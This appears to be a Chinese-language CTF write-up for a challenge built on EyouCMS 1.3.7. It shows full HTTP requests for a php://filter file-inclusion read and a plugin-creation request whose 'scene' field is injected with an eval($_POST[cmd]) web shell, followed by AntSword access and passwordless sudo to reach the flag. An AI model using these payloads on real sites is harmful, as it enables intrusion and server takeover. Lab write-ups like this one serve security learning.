(゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚ー゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+((゚ー゚) + (゚Θ゚))+ (゚Θ゚)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');

颜文字解密得到

1
alert("Challenger, the background of the website is -.../--/--../.-/-../--/../-.");

摩斯密码解密得到

1
bmzadmin

使用文件包含查看bmzadmin.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /?lang=php://filter/convert.base64-encode/resource=bmzadmin HTTP/1.1
Host: www.bmzclub.cn:21490
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ca99f077-3758-40ca-802a-0b8afbf5b9e7; Hm_lvt_d7a3b863d5a302676afbe86b11339abd=1612590588,1612590698; Hm_lpvt_d7a3b863d5a302676afbe86b11339abd=1612590698; PHPSESSID=r8hvjhmrvbjjcp8sbov7pmm2p0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18


得到bmzadmin.php内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php

header("Content-type:text/html;charset=utf-8");
// [ 应用入口文件 ]
if (extension_loaded('zlib')){
    try{
        ob_end_clean();
    } catch(Exception $e) {

    }
    ob_start('ob_gzhandler');
}
// 检测PHP环境
if(version_compare(PHP_VERSION,'5.4.0','<'))  die('本系统要求PHP版本 >= 5.4.0,当前PHP版本为:'.PHP_VERSION . ',请到虚拟主机控制面板里切换PHP版本,或联系空间商协助切换。<a href="http://www.eyoucms.com/help/" target="_blank">点击查看易优安装教程</a>');
// error_reporting(E_ALL ^ E_NOTICE);//显示除去 E_NOTICE 之外的所有错误信息
error_reporting(E_ERROR | E_WARNING | E_PARSE);//报告运行时错误

// 检测是否已安装EyouCMS系统
if(file_exists("./install/") && !file_exists("./install/install.lock")){
    header('Location:./install/index.php');
    exit(); 
}

// 绑定当前访问到admin模块
define('BIND_MODULE','admin');
// 缓存时间
define('EYOUCMS_CACHE_TIME', 86400);
// 数据绝对路径
define('DATA_PATH', __DIR__ . '/data/');
// 运行缓存
define('RUNTIME_PATH', DATA_PATH . 'runtime/');
// 安装程序定义
define('DEFAULT_INSTALL_DATE',1525756440);
// 序列号
define('DEFAULT_SERIALNUMBER','20180508131400oCWIoa');
// 定义应用目录
define('APP_PATH', __DIR__ . '/application/');
// 加载框架引导文件
require __DIR__ . '/core/start.php';

发现是eyoucms,访问bmzadmin.php,发现登录界面

对其一顿暴破发现啥也不是,接着看wp,发现index.php中之前看到的password,做到这里给忘了。。。

用户名admin和bmzadmin都不对,在首页源码中存在

1
<p>Power by<a href="#">@kuaile</a></p>

试一下用户名kuaile,登录成功,发现eyoucms版本为1.3.7

在零组文库找一下eyoucms漏洞,发现1.3.9以前版本插件处存在文件上传漏洞

根据文库复现步骤进行复现

在Weapp.php文件中的upload()方法中可以上传zip文件,并会自动解压到一个文件夹名是随机md5值的文件夹下

在后台开启插件功能,上传zip文件,zip中有php一句话木马以及一个任意图片(图片内容无所谓,正常图片即可,但是必须得有)

上传后,虽然会返回错误信息,但是实际上后台已经解压了zip文件

访问内容管理模块,任意选择一个产品进行编辑,再图片集处可以上传图片,选择在线管理,可以在左侧看到该文件夹名

直接访问该文件夹下的php一句话木马文件即可

到在线管理处,发现漏洞详情中所提的文件夹名不存在

再看wp,wp提到可能是本题环境做了限制,不过存在另一处漏洞可getshell

点击插件应用-插件开发者,按要求填写相关信息后,使用burpsuite进行拦截,点击初始化结构,放行第一个请求,拦截第二个请求,发送到repeater

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /bmzadmin.php?m=admin&c=Weapp&a=create&lang=cn HTTP/1.1
Host: www.bmzclub.cn:21490
Content-Length: 94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.bmzclub.cn:21490
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.bmzclub.cn:21490/bmzadmin.php?m=admin&c=Weapp&a=create&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ca99f077-3758-40ca-802a-0b8afbf5b9e7; PHPSESSID=r8hvjhmrvbjjcp8sbov7pmm2p0; Hm_lvt_d7a3b863d5a302676afbe86b11339abd=1612590588,1612590698,1612599669; admin_lang=cn; home_lang=cn; Hm_lpvt_d7a3b863d5a302676afbe86b11339abd=1612600412; ENV_GOBACK_URL=%2Fbmzadmin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Fbmzadmin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0; workspaceParam=index%7CWeapp
Connection: close

code=Shell&name=shell&version=v1.0.0&min_version=v1.3.7&author=shell&scene=0&description=shell

修改scene=0scene=bbb\',${eval($_POST[cmd])},//,send

验证shell

蚁剑连接,在根目录下没找到flag,查看/root目录发现flag,直接查看发现没权限

打开终端,sudo -l发现当前用户www-data可以root身份执行所有操作,并且不需要输入密码

直接查看flag